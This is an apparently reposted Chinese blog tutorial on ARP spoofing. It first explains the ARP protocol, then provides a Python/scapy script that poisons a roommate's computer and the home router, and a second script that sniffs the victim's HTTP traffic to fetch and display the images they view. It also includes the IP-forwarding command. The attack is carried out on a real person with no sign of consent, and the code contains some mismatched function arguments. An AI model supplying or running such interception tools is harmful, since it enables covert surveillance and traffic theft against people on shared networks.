利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

选择kali支持的无线网卡可参考链接:http://www.freebuf.com/articles/wireless/140065.html

不过要注意一点,wn722n型号的无线网卡只有v1才支持kali,现在网上大多数卖的都是v2的,如果选择这一款买的时候要好好看一下,不要选错

arp协议研究

在进行arp攻击之前,先来研究一下arp协议

arp协议的全称为地址解析协议,是一种工作在网络层的协议,是一种将ip地址转换为MAC地址(物理地址)的协议

因为在OSI七层模型中,ip地址在第三层网络层,传送的是ip数据报,mac地址在第二层数据链路层,传送的是数据帧,二层的以太网交换设备并不能识别32位的IP地址,它们是以48位以太网地址(就是我们常说的MAC地址)传输以太网数据包(帧)的,局域网的机器要和其他机器进行通信,首先要获取对方的物理地址,所以arp协议便把ip地址转换为物理地址来实现这种对应关系

arp协议数据包

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

进群:548377875   即可获取数十套PDF哦

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

这样发起 arp 请求的机器从 arp 响应包里获取 MAC 地址并添加到本机 arp 缓存中,与网关进行通信,在这里要注意一点,在本机向网关发送 arp 请求的同时,网关也会向本机发送 arp 请求获取本机 MAC 地址,同时本机也会向网关发送 arp 响应,这时一个双向的过程,这里不再重复

接下来为了更清楚的理解,用 wireshark 抓包来观察一下 arp 请求包和响应包

选择抓包的网卡接口,在这选择wlan0,并向网关发起ping请求与网关通信,本机 ip 为192.168.0.106,网关ip为192.168.0.1

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

在过滤窗口输入arp&&ip.addr==192.168.0.1将arp数据包过滤出来

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

观察arp请求包和响应包是否和上述描述的一致,图中做出了详细标明

arp请求包

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

arp响应包

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

arp欺骗

上面描述完了arp协议,下面来说一下arp欺骗攻击,假设局域网内有三台机器

网关:192.168.0.1

受害者机器:192.168.0.108

本机kali:192.168.0.106

正常情况下,如果受害者和网关要进行通信,首先要使用arp协议进行对方的MAC地址获取,但是如果攻击者不断的向受害者发送arp响应包,告诉受害者网关的MAC地址为自己的MAC地址,包的大致内容如下

op:2(op值为2说明这是一次arp响应)

hwsrc:发送方MAC地址(攻击者MAC地址)

psrc:发送方ip地址(网关ip地址)

hwdst:目标MAC地址(受害者MAC地址)

pdst:目标ip地址(受害者ip地址)

在这里发送方ip是网关的ip,但是发送方MAC已经变为了攻击者(kali)的MAC地址,受害者不断的接收这个arp响应包,便会在自己的arp缓存中不断的更新错误的ip与MAC的对应关系,及网关的MAC为攻击者的MAC,由此攻击者的网卡便可以捕获到受害者到网关之间的流量,到现在实现了arp断网,受害者因为与错误的MAC地址进行通讯而上不了网,如果攻击者的机器开启了ip转发,便可以将从受害者截取到的流量转发出去给网关,实现arp欺骗,也称为中间人攻击

arp欺骗一般是双向欺骗,我们通过arp欺骗可以捕获到受害者到网关的流量,同样的我们可以向网关发送arp响应包欺骗网关受害者的MAC地址为自己的MAC地址,截获网关到受害者之间的流量,arp响应包大致如下

op:2(op值为2说明这是一次arp响应)

hwsrc:发送方MAC地址(攻击者MAC地址)

psrc:发送方ip地址(受害者ip地址)

hwdst:目标MAC地址(网关MAC地址)

pdst:目标ip地址(网关ip地址)

同样的网关在不断接受到此arp响应时也会不断的更新自己的arp缓存去建立错误的关系,我们的kali攻击机便可以双向的截获流量

用python实现arp攻击

所需的python第三方库

scapy库:scapy是一个可用于网络嗅探的非常强大的第三方库。可以伪造,嗅探或发送网络数据包,这这里我们使用scapy库伪造arp响应包并发送,首先安装scapy库,kali自带

pip install scapy

模拟攻击环境,一个真实的局域网,就是我们寝室

自己的kali攻击机:192.168.0.106,装在vm虚拟机中,连接了RT3070型号的无线网卡

室友的电脑:192.168.0.108,连接同一路由器的无线网

网关:192.168.0.1

编写python代码:arpattack.py

from scapy.all import *#导入scapy模块
from optparse import OptionParser#导入命令行参数处理模块optparse
import sys
def main():
 usage="Usage: [-i interface] [-t targetip] [-g gatewayip]"
 parser=OptionParser(usage)
 parser.add_option('-i',dest='interface',help='select interface(input eth0 or wlan0 or more)')#-i 所选择的网卡,eth0或wlan0,存放在interface变量中
 parser.add_option('-t',dest='targetip',help='select ip to spoof')#-t 要攻击的ip,存放在targetip变量中
 parser.add_option('-g',dest='gatewayip',help='input gateway ip')#-g 网关ip,存放在gatewayip变量中
 (options,args)=parser.parse_args()
 if options.interface and options.targetip and options.gatewayip:
 interface=options.interface
 tip=options.targetip
 gip=options.gatewayip
 spoof(interface,tip,gip)#将参数传给spoof函数
 else:
 parser.print_help()#显示帮助
 sys.exit(0)
def spoof(interface,gip):#获取命令行的输入实现arp攻击
 localmac=get_if_hwaddr(interface)#get_if_hwaddr获取本地网卡MAC地址
 tmac=getmacbyip(tip)#根据目标ip获取其MAC地址
 gmac=getmacbyip(gip)#根据网关ip获取其MAC地址
 ptarget=Ether(src=localmac,dst=tmac)/ARP(hwsrc=localmac,psrc=gip,hwdst=tmac,pdst=tip,op=2)#构造arp响应包,欺骗目标机器网关的MAC地址为本机MAC地址
 pgateway=Ether(src=localmac,dst=gmac)/ARP(hwsrc=localmac,psrc=tip,hwdst=gmac,pdst=gip,op=2)#构造arp响应包,欺骗网关目标机器的MAC地址为本机MAC地址
 try:
 while 1:
 sendp(ptarget,inter=2,iface=interface)
 print "send arp reponse to target(%s),gateway(%s) macaddress is %s"%(tip,gip,localmac)
 sendp(pgateway,iface=interface)
 print "send arp reponse to gateway(%s),target(%s) macaddress is %s"%(gip,localmac)#不断发送arp响应包欺骗目标机器和网关,直到ctrl+c结束程序
 except KeyboardInterrupt:
 sys.exit(0)
if __name__=='__main__':
 main()

脚本使用到的scapy库中的几个函数

get_if_hwaddr("本地网卡名称(eth0/wlan0)") 根据所选择的本地网卡获取相应的本地网卡的MAC地址

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

getmacbyip("ip地址") 根据ip地址获取其MAC地址,使用该函数实际上使用了一次arp协议,可以用此函数获取网关和目标的MAC地址

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

ARP是构建ARP数据包的类,Ether用来构建以太网数据包,构造arp数据包并加上以太网头部

Ether(src=本地网卡MAC,dst=目标机器MAC)/ARP(hwsrc=本地网卡MAC,psrc=网关ip,hwdst=目标机器MAC,pdst=目标机器ip,op=2)
构造发送给目标机器的arp数据包,并加上以太网头部,欺骗目标机器网关的MAC为本机的MAC
Ether(src=本地网卡MAC,dst=网关MAC)/ARP(hwsrc=本地网卡MAC,hwdst=网关MAC,pdst=网关ip,op=2)
构造发送给网关的arp数据包,并加上以太网头部,欺骗网关目标机器的MAC为本机的MAC
sendp函数发送我们构造的arp数据包 sendp(数据包,iface=网卡) sendp函数工作在网络的第二层

以上代码实现了类似于arpspoof工具的功能,使用方法,进入脚本目录,输入

python arpattack.py -h

查看脚本使用帮助

Usage: [-i interface] [-t targetip] [-g gatewayip]
Options:
 -h,--help show this help message and exit
 -i INTERFACE select interface(input eth0 or wlan0 or more)
 -t TARGETIP select ip to spoof
 -g GATEWAYIP input gateway ip

所以我们这样输入可以双向的欺骗网关和目标机器完中间人攻击

python arpattack.py -i 网卡 -t 要攻击的目标的ip地址 -g 网关ip

输入

python arpattack.py -i wlan0 -t 192.168.0.8 -g 192.168.0.1

选择无线网卡wlan0的MAC地址去欺骗室友的电脑和网关路由器,如果我和室友都插了网线,就要选择eth0

运行脚本便会不断的向室友的电脑和网关发送arp响应包进行双向欺骗,效果如下

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

室友电脑 arp 缓存

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

路由器 arp 缓存

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

这时我们截获了室友电脑和网关之间的流量,使其不能相互通信,完成了arp断网

echo "1">/proc/sys/net/ipv4/ip_forward

开启流量转发,这时室友和网关正常通讯,但是流量会经过我们的网卡

接下来用python编写代码查看室友电脑浏览的网页图片,其实不难,因为浏览图片一般都是向服务器发送一次请求图片的http请求,所以只需从经过我们网卡的流量中过滤tcp80端口的数据包(http协议),将数据包的头部层层去掉,最后便能得到应用层的http数据包,在利用正则表达式将http://*.jpg筛选出来即可知道室友请求了哪些图片,python的pcap库和dpkt库可以使我们很容易的得到电脑网卡流量中的http应用层数据包

apt-get install libpcap-dev
pip install pypcap
pip install dpkt

安装pcap库和dpkt库

pcap模块的pcap方法可以返回一个用来捕获网卡数据包的pcap对象

dpkt,一个数据包解析工具,可以解析离线/实时pcap数据包

python代码如下stealimg.py

import pcap
import dpkt
import re
import requests
from PIL import Image
from io import BytesIO
from optparse import OptionParser
import sys
urllist=[]
def main():
 usage="Usage: [-i interface]"
 parser=OptionParser(usage)
 parser.add_option('-i',help='select interface(input eth0 or wlan0 or more)')
 (options,args)=parser.parse_args()
 if options.interface:
 interface=options.interface
 pc=pcap.pcap(interface)
 pc.setfilter('tcp port 80')
 for ptime,pdata in pc:
 getimg(pdata)
 else:
 parser.print_help()
 sys.exit(0)
def getimg(pdata):
 global urllist
 p=dpkt.ethernet.Ethernet(pdata)
 if p.data.__class__.__name__=='IP':
 if p.data.data.__class__.__name__=='TCP':
 if p.data.data.dport==80:
 pa=re.compile(r'GET (.*?.jpg)')#|.*?.png|.*?.gif
 img=re.findall(pa,p.data.data.data)
 if img!=[]:
 lines=p.data.data.data.split('
')
 for line in lines:
 if 'Host:' in line:
 url='http://'+line.split(':')[-1].strip()+img[-1]
 if url not in urllist:
 urllist.append(url)
 if 'Referer:' in p.data.data.data:
 for line in lines:
 if 'Referer:' in line:
 referer=line.split(':')[-1].strip()
 print url
 r=requests.get(url,headers={'Referer':referer})
 img=Image.open(BytesIO(r.content))
 img.show()
 else:
 r=requests.get(url)
 img=Image.open(BytesIO(r.content))
 img.show()
 else:
 pass
if __name__=='__main__':
 main() 

代码将pcap从本机网卡捕获到的完整的网络数据包使用dpkt库将其中封装的http应用层数据包提取出来,通过正则表达式将请求图片的http请求过滤出来,并在本机请求并输出,完成窥屏,效果如下

用法 stealimg,py -i wlan0

室友电脑浏览图片

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

自己kali可以窥屏

利用Python&ARP欺骗抓图片!回首掏,哎就是封不了我的IP!难受

注意一点,百度图片爬取要在http请求头中加上Referer字段,否则会出现403禁止访问,代码只是简单的实现了窥屏的效果,还有着很多不足,不过通过这次学习可以对arp欺骗攻击有更深的理解

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


我最近重新拾起了计算机视觉,借助Python的opencv还有face_recognition库写了个简单的图像识别demo,额外定制了一些内容,原本想打包成exe然后发给朋友,不过在这当中遇到了许多小问题,都解决了,记录一下踩过的坑。 1、Pyinstaller打包过程当中出现warning,跟d
说到Pooling,相信学习过CNN的朋友们都不会感到陌生。Pooling在中文当中的意思是“池化”,在神经网络当中非常常见,通常用的比较多的一种是Max Pooling,具体操作如下图: 结合图像理解,相信你也会大概明白其中的本意。不过Pooling并不是只可以选取2x2的窗口大小,即便是3x3,
记得大一学Python的时候,有一个题目是判断一个数是否是复数。当时觉得比较复杂不好写,就琢磨了一个偷懒的好办法,用异常处理的手段便可以大大程度帮助你简短代码(偷懒)。以下是判断整数和复数的两段小代码: 相信看到这里,你也有所顿悟,能拓展出更多有意思的方法~
文章目录 3 直方图Histogramplot1. 基本直方图的绘制 Basic histogram2. 数据分布与密度信息显示 Control rug and density on seaborn histogram3. 带箱形图的直方图 Histogram with a boxplot on t
文章目录 5 小提琴图Violinplot1. 基础小提琴图绘制 Basic violinplot2. 小提琴图样式自定义 Custom seaborn violinplot3. 小提琴图颜色自定义 Control color of seaborn violinplot4. 分组小提琴图 Group
文章目录 4 核密度图Densityplot1. 基础核密度图绘制 Basic density plot2. 核密度图的区间控制 Control bandwidth of density plot3. 多个变量的核密度图绘制 Density plot of several variables4. 边
首先 import tensorflow as tf tf.argmax(tenso,n)函数会返回tensor中参数指定的维度中的最大值的索引或者向量。当tensor为矩阵返回向量,tensor为向量返回索引号。其中n表示具体参数的维度。 以实际例子为说明: import tensorflow a
seaborn学习笔记章节 seaborn是一个基于matplotlib的Python数据可视化库。seaborn是matplotlib的高级封装,可以绘制有吸引力且信息丰富的统计图形。相对于matplotlib,seaborn语法更简洁,两者关系类似于numpy和pandas之间的关系,seabo
Python ConfigParser教程显示了如何使用ConfigParser在Python中使用配置文件。 文章目录 1 介绍1.1 Python ConfigParser读取文件1.2 Python ConfigParser中的节1.3 Python ConfigParser从字符串中读取数据
1. 处理Excel 电子表格笔记(第12章)(代码下载) 本文主要介绍openpyxl 的2.5.12版处理excel电子表格,原书是2.1.4 版,OpenPyXL 团队会经常发布新版本。不过不用担心,新版本应该在相当长的时间内向后兼容。如果你有新版本,想看看它提供了什么新功能,可以查看Open
1. 发送电子邮件和短信笔记(第16章)(代码下载) 1.1 发送电子邮件 简单邮件传输协议(SMTP)是用于发送电子邮件的协议。SMTP 规定电子邮件应该如何格式化、加密、在邮件服务器之间传递,以及在你点击发送后,计算机要处理的所有其他细节。。但是,你并不需要知道这些技术细节,因为Python 的
文章目录 12 绘图实例(4) Drawing example(4)1. Scatterplot with varying point sizes and hues(relplot)2. Scatterplot with categorical variables(swarmplot)3. Scat
文章目录 10 绘图实例(2) Drawing example(2)1. Grouped violinplots with split violins(violinplot)2. Annotated heatmaps(heatmap)3. Hexbin plot with marginal dist
文章目录 9 绘图实例(1) Drawing example(1)1. Anscombe’s quartet(lmplot)2. Color palette choices(barplot)3. Different cubehelix palettes(kdeplot)4. Distribution
Python装饰器教程展示了如何在Python中使用装饰器基本功能。 文章目录 1 使用教程1.1 Python装饰器简单示例1.2 带@符号的Python装饰器1.3 用参数修饰函数1.4 Python装饰器修改数据1.5 Python多层装饰器1.6 Python装饰器计时示例 2 参考 1 使
1. 用GUI 自动化控制键盘和鼠标第18章 (代码下载) pyautogui模块可以向Windows、OS X 和Linux 发送虚拟按键和鼠标点击。根据使用的操作系统,在安装pyautogui之前,可能需要安装一些其他模块。 Windows: 不需要安装其他模块。OS X: sudo pip3
文章目录 生成文件目录结构多图合并找出文件夹中相似图像 生成文件目录结构 生成文件夹或文件的目录结构,并保存结果。可选是否滤除目录,特定文件以及可以设定最大查找文件结构深度。效果如下: root:[z:/] |--a.py |--image | |--cat1.jpg | |--cat2.jpg |
文章目录 VENN DIAGRAM(维恩图)1. 具有2个分组的基本的维恩图 Venn diagram with 2 groups2. 具有3个组的基本维恩图 Venn diagram with 3 groups3. 自定义维恩图 Custom Venn diagram4. 精致的维恩图 Elabo
mxnet60分钟入门Gluon教程代码下载,适合做过深度学习的人使用。入门教程地址: https://beta.mxnet.io/guide/getting-started/crash-course/index.html mxnet安装方法:pip install mxnet 1 在mxnet中使
文章目录 1 安装2 快速入门2.1 基本用法2.2 输出图像格式2.3 图像style设置2.4 属性2.5 子图和聚类 3 实例4 如何进一步使用python graphviz Graphviz是一款能够自动排版的流程图绘图软件。python graphviz则是graphviz的python实